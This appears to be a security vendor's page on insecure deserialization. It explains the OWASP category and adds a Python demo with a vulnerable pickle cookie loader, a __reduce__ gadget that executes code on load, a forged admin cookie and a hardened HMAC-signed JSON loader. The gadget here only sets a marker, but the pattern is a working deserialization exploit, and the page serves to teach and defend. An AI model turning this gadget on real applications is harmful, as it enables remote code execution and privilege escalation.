A8: Insecure Deserialization

App Specific

Exploitation of deserialization flaws is somewhat difficult, as off-the-shelf exploits rarely work without changes or tweaks to the underlying exploit code: the attacker usually needs to know which classes (gadgets) are on the application's classpath and adapt the payload to them.



Prevalence



This issue is included in the Top 10 based on an industry survey and not on quantifiable data. Some tools can discover deserialization flaws, but human assistance is frequently needed to validate the problem.

It is expected that prevalence data for deserialization flaws will increase as tooling is developed to help identify and address it.

Technical

The impact of deserialization flaws cannot be overstated. These flaws can lead to remote code execution, one of the most serious attacks possible. The business impact depends on the protection needs of the application and data.

Applications and APIs will be vulnerable if they deserialize hostile or tampered objects supplied by an attacker.

This can result in two primary types of attacks:

  • Object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behaviour during or after deserialization.

  • Typical data tampering attacks, such as access-control-related attacks, where existing data structures are used but the content is changed.

Serialization may be used in applications for:

  • Remote- and inter-process communication (RPC/IPC)

  • Wire protocols, web services, message brokers

  • Caching/Persistence

  • Databases, cache servers, file systems

  • HTTP cookies, HTML form parameters, API authentication tokens.
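The two attack types above, shown against the last item in that list (a session cookie), as an added example that is not code from the original page or from Valency Networks. It uses Python's pickle as the stand-in for any native serialization format (the same pattern applies to Java serialization, PHP unserialize, .NET BinaryFormatter and so on). The cookie layout, field names, the Gadget class and SECRET_KEY are all assumptions made for the demonstration; the gadget only sets a marker attribute rather than running a command, so it is harmless to run.

```python
import base64
import builtins
import hashlib
import hmac
import json
import pickle

# ---------------------------------------------------------------------------
# Vulnerable pattern (assumed app design): the session cookie is a base64-encoded
# pickle, and the server calls pickle.loads() on whatever the client sends back.
# ---------------------------------------------------------------------------

def make_session_cookie_pickle(session: dict) -> str:
    """Server side: serialize the session dict into a cookie value."""
    return base64.b64encode(pickle.dumps(session)).decode()


def load_session_cookie_pickle(cookie: str):
    """Server side, VULNERABLE: pickle.loads() executes whatever the stream says."""
    return pickle.loads(base64.b64decode(cookie))


# Attack type 1 (object attack): a pickle stream is a small program, not inert
# data. __reduce__ makes pickle store "call exec(PAYLOAD)" instead of an object,
# so the callable runs inside pickle.loads() on the server. This demo payload
# only sets a marker attribute; a real one would call os.system or similar.
PAYLOAD = "import builtins; builtins.DESER_MARKER = 'code ran inside pickle.loads'"


class Gadget:  # attacker-side class, never needs to exist on the server
    def __reduce__(self):
        return (exec, (PAYLOAD,))


def forge_rce_cookie() -> str:
    """Attacker side: a cookie that runs PAYLOAD when the server deserializes it."""
    return base64.b64encode(pickle.dumps(Gadget())).decode()


def rce_marker():
    """Returns the marker the payload sets, or None if it never ran."""
    return getattr(builtins, "DESER_MARKER", None)


# Attack type 2 (data tampering): keep the server's own structure, change the
# content. Without an integrity check the server cannot tell the difference.
def forge_tampered_cookie(own_cookie: str) -> str:
    session = pickle.loads(base64.b64decode(own_cookie))  # attacker decodes own cookie
    session["role"] = "admin"
    return make_session_cookie_pickle(session)


# ---------------------------------------------------------------------------
# Hardened pattern: a data-only format (JSON) plus an HMAC, so a modified or
# forged cookie is rejected before any parsing happens. The key is fixed here
# for the demo; a real deployment loads it from a secret store.
# ---------------------------------------------------------------------------
SECRET_KEY = b"demo-only-key-replace-me"
ALLOWED_FIELDS = {"user", "role"}


def _tag(body: str, key: bytes) -> str:
    return hmac.new(key, body.encode(), hashlib.sha256).hexdigest()


def make_session_cookie_signed(session: dict, key: bytes = SECRET_KEY) -> str:
    body = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    return f"{body}.{_tag(body, key)}"


def load_session_cookie_signed(cookie: str, key: bytes = SECRET_KEY):
    """Returns the session dict, or None for anything not produced with `key`."""
    body, sep, tag = cookie.rpartition(".")
    if not sep or not hmac.compare_digest(tag.encode(), _tag(body, key).encode()):
        return None  # signature missing or wrong: reject before deserializing
    try:
        session = json.loads(base64.urlsafe_b64decode(body))
    except ValueError:  # bad base64, bad UTF-8 or bad JSON
        return None
    # JSON yields only dicts, lists, strings and numbers: nothing executes on
    # load. Still enforce the expected shape so the rest of the app can trust it.
    if not isinstance(session, dict) or set(session) != ALLOWED_FIELDS:
        return None
    if not all(isinstance(v, str) for v in session.values()):
        return None
    return session


if __name__ == "__main__":
    legit = {"user": "guest", "role": "user"}

    load_session_cookie_pickle(forge_rce_cookie())
    print("pickle loader, gadget cookie  :", rce_marker())

    tampered = forge_tampered_cookie(make_session_cookie_pickle(legit))
    print("pickle loader, tampered cookie:", load_session_cookie_pickle(tampered)["role"])

    signed = make_session_cookie_signed(legit)
    _, _, tag = signed.rpartition(".")
    evil_body = base64.urlsafe_b64encode(b'{"role": "admin", "user": "guest"}').decode()
    print("signed loader, tampered cookie:", load_session_cookie_signed(f"{evil_body}.{tag}"))
    print("signed loader, gadget cookie  :", load_session_cookie_signed(forge_rce_cookie()))
    print("signed loader, valid cookie   :", load_session_cookie_signed(signed))
```

Two things to note when reading the output. First, the gadget cookie runs its payload before the vulnerable loader even returns, and the class used to build it never has to exist on the server: pickle only records "call this callable with these arguments". Second, the hardened loader rejects both attacks for different reasons: the tampered body fails the HMAC check, and the gadget cookie is never handed to a deserializer at all, because JSON has no way to express "call a function". The HMAC is what stops tampering; switching to a data-only format is what stops the object attack, and both are needed.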

How to detect this security problem?

The Valency Networks technical team is highly capable of running application scans and also performing manual vulnerability assessments to find this security problem. We can also help you redesign the affected code component or provide inputs towards a successful fix.

Contact us for more details

What Our Customers Say?

Valency Networks is a very technical company, focused on continuous improvement in service quality. Our customers like us exactly for that, and it helps us keep our quality at its best.